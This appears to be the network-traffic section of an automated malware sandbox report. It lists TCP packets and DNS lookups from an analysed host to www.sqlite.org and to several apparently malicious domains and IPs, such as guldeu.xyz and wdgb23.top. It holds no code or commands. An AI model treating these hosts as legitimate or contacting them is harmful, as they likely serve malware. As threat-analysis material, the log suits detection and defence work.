                                                                                                  Oct 21, 2024 13:15:28.634816885 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634828091 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634839058 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634855032 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634872913 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.676902056 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.676949978 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.676970005 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.676987886 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.677011013 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.677025080 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.677026987 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.677064896 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.677087069 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.677100897 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.677103996 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.677180052 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.722358942 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.722404003 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.722419977 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.722443104 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.722457886 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.722480059 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.722481012 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.722515106 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751065016 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751096964 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751132011 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751127958 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751163960 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751188040 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751188040 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751202106 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751427889 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751450062 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751471996 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751487017 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751496077 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751518011 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751526117 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751534939 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751552105 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751554966 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751569033 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751570940 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751585960 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751590014 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751601934 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751620054 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751754999 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751770020 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751786947 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751794100 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751816988 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751822948 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751838923 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751854897 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751857996 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751873016 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751885891 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752037048 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752052069 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752068996 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752075911 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752094984 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:16:02.662410975 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:02.662478924 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:02.673089027 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:02.679342985 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:02.679402113 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:02.679698944 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:02.684762001 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:02.684813976 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:03.356532097 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:03.394700050 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:03.394757032 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:04.182859898 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:05.199935913 CEST4917780192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:06.452374935 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:06.452536106 CEST4917780192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:06.459635019 CEST4917780192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:06.465025902 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:07.149261951 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:07.187856913 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:07.187952042 CEST4917780192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:07.188860893 CEST4917780192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:07.194257975 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.221074104 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:12.226563931 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.226651907 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:12.237410069 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:12.243041992 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.243072987 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.243108034 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:12.248797894 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.853171110 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.853219986 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:13.747498989 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:13.752940893 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:14.766422987 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:14.772084951 CEST804917915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:14.772351027 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:14.785214901 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:14.790687084 CEST804917915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:15.419595003 CEST804917915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:15.421025038 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:16.288583994 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:16.294024944 CEST804917915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.305341005 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:17.311002970 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.311264992 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:17.337447882 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:17.342955112 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.343046904 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:17.343128920 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.348515987 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.348615885 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:18.846941948 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:18.853418112 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:18.853621006 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:19.863584995 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:19.873435974 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:19.873512983 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:19.880147934 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:19.885634899 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:19.945308924 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:16:19.951579094 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:16:19.951710939 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:16:20.496273041 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:20.496898890 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:20.496951103 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:20.499017000 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:20.504251003 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.508841991 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:25.514314890 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.514409065 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:25.525779009 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:25.531228065 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.531397104 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:25.531557083 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.536875963 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:26.471731901 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:26.658365011 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:26.658413887 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:27.039271116 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:28.056098938 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:28.129992962 CEST8049183206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:28.130068064 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:28.145299911 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:28.150758982 CEST8049183206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:29.086075068 CEST8049183206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:29.267734051 CEST8049183206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:29.267848969 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:29.661098957 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.676791906 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.682311058 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:30.682408094 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.697880030 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.703453064 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:30.703464985 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:30.703522921 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.709064007 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:30.709074974 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:31.623502970 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:31.798542976 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:31.798958063 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:32.200500011 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:33.217433929 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:33.407581091 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:33.407649040 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:33.414256096 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:33.420574903 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:34.383672953 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:34.565193892 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:34.567265987 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:34.567265987 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:34.572829008 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.613337040 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:39.618743896 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.618798971 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:39.629641056 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:39.635067940 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.635081053 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.635128975 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:39.640463114 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:40.266624928 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:40.266902924 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:41.139410019 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:41.144835949 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:42.155632019 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:42.161248922 CEST804918715.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:42.161412001 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:42.174022913 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:42.179516077 CEST804918715.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:42.788275003 CEST804918715.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:42.788384914 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:43.682038069 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:43.789278984 CEST804918715.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.698805094 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:44.704284906 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.704432964 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:44.715029955 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:44.720451117 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.720535040 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.720576048 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:44.725985050 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.726033926 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:46.224909067 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:46.230690002 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:46.230757952 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:47.241723061 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:47.247370005 CEST804918915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:47.247431993 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:47.254251957 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:47.259643078 CEST804918915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:48.791564941 CEST804918915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:48.792478085 CEST804918915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:48.792562008 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:48.794301987 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:48.799658060 CEST804918915.197.148.33192.168.2.22
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 21, 2024 13:15:19.816417933 CEST5278153192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:19.827888966 CEST53527818.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:25.310534000 CEST6392653192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:25.321059942 CEST53639268.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:35.506843090 CEST6551053192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:35.514727116 CEST53655108.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:49.422194958 CEST6267253192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:49.432833910 CEST53626728.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:50.448462963 CEST5647553192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:50.486641884 CEST53564758.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:51.502863884 CEST4938453192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:51.512804985 CEST53493848.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:52.516401052 CEST5484253192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:52.526149988 CEST53548428.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:57.526055098 CEST5810553192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:57.558804989 CEST53581058.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.210398912 CEST6492853192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:16:12.218950987 CEST53649288.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.496990919 CEST5739053192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:16:25.506719112 CEST53573908.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.588747978 CEST5809553192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:16:39.611196041 CEST53580958.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:16:53.794759989 CEST5426153192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:16:53.808384895 CEST53542618.8.8.8192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 21, 2024 13:15:19.816417933 CEST | 192.168.2.22 | 8.8.8.8 | 0x6298 | Standard query (0) | www.deikamalaharris.info | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:25.310534000 CEST | 192.168.2.22 | 8.8.8.8 | 0x2db5 | Standard query (0) | www.sqlite.org | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:35.506843090 CEST | 192.168.2.22 | 8.8.8.8 | 0xfd7a | Standard query (0) | www.rockbull.pro | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:49.422194958 CEST | 192.168.2.22 | 8.8.8.8 | 0x2303 | Standard query (0) | www.timetime.store | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:50.448462963 CEST | 192.168.2.22 | 8.8.8.8 | 0x7f57 | Standard query (0) | www.timetime.store | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:51.502863884 CEST | 192.168.2.22 | 8.8.8.8 | 0xef21 | Standard query (0) | www.timetime.store | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:52.516401052 CEST | 192.168.2.22 | 8.8.8.8 | 0xdc57 | Standard query (0) | www.timetime.store | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:57.526055098 CEST | 192.168.2.22 | 8.8.8.8 | 0x59ff | Standard query (0) | www.guldeu.xyz | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:12.210398912 CEST | 192.168.2.22 | 8.8.8.8 | 0xf1c7 | Standard query (0) | www.asiapartnars.online | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:25.496990919 CEST | 192.168.2.22 | 8.8.8.8 | 0x30a2 | Standard query (0) | www.wdgb23.top | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:39.588747978 CEST | 192.168.2.22 | 8.8.8.8 | 0x3458 | Standard query (0) | www.childlesscatlady.today | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:53.794759989 CEST | 192.168.2.22 | 8.8.8.8 | 0xb2db | Standard query (0) | www.martaschrimpf.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 21, 2024 13:14:56.005990982 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd47 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:14:56.005990982 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd47 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:19.827888966 CEST | 8.8.8.8 | 192.168.2.22 | 0x6298 | No error (0) | www.deikamalaharris.info | deikamalaharris.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 13:15:19.827888966 CEST | 8.8.8.8 | 192.168.2.22 | 0x6298 | No error (0) | deikamalaharris.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:19.827888966 CEST | 8.8.8.8 | 192.168.2.22 | 0x6298 | No error (0) | deikamalaharris.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:25.321059942 CEST | 8.8.8.8 | 192.168.2.22 | 0x2db5 | No error (0) | www.sqlite.org | | 45.33.6.223 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:35.514727116 CEST | 8.8.8.8 | 192.168.2.22 | 0xfd7a | No error (0) | www.rockbull.pro | rockbull.pro | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 13:15:35.514727116 CEST | 8.8.8.8 | 192.168.2.22 | 0xfd7a | No error (0) | rockbull.pro | | 185.174.173.22 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:49.432833910 CEST | 8.8.8.8 | 192.168.2.22 | 0x2303 | Name error (3) | www.timetime.store | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:50.486641884 CEST | 8.8.8.8 | 192.168.2.22 | 0x7f57 | Name error (3) | www.timetime.store | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:51.512804985 CEST | 8.8.8.8 | 192.168.2.22 | 0xef21 | Name error (3) | www.timetime.store | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:52.526149988 CEST | 8.8.8.8 | 192.168.2.22 | 0xdc57 | Name error (3) | www.timetime.store | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:15:57.558804989 CEST | 8.8.8.8 | 192.168.2.22 | 0x59ff | No error (0) | www.guldeu.xyz | | 162.0.238.246 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:12.218950987 CEST | 8.8.8.8 | 192.168.2.22 | 0xf1c7 | No error (0) | www.asiapartnars.online | asiapartnars.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 13:16:12.218950987 CEST | 8.8.8.8 | 192.168.2.22 | 0xf1c7 | No error (0) | asiapartnars.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:12.218950987 CEST | 8.8.8.8 | 192.168.2.22 | 0xf1c7 | No error (0) | asiapartnars.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:25.506719112 CEST | 8.8.8.8 | 192.168.2.22 | 0x30a2 | No error (0) | www.wdgb23.top | wdgb23.top | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 13:16:25.506719112 CEST | 8.8.8.8 | 192.168.2.22 | 0x30a2 | No error (0) | wdgb23.top | | 206.119.82.148 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:39.611196041 CEST | 8.8.8.8 | 192.168.2.22 | 0x3458 | No error (0) | www.childlesscatlady.today | childlesscatlady.today | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 13:16:39.611196041 CEST | 8.8.8.8 | 192.168.2.22 | 0x3458 | No error (0) | childlesscatlady.today | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:39.611196041 CEST | 8.8.8.8 | 192.168.2.22 | 0x3458 | No error (0) | childlesscatlady.today | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 13:16:53.808384895 CEST | 8.8.8.8 | 192.168.2.22 | 0xb2db | No error (0) | www.martaschrimpf.info | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
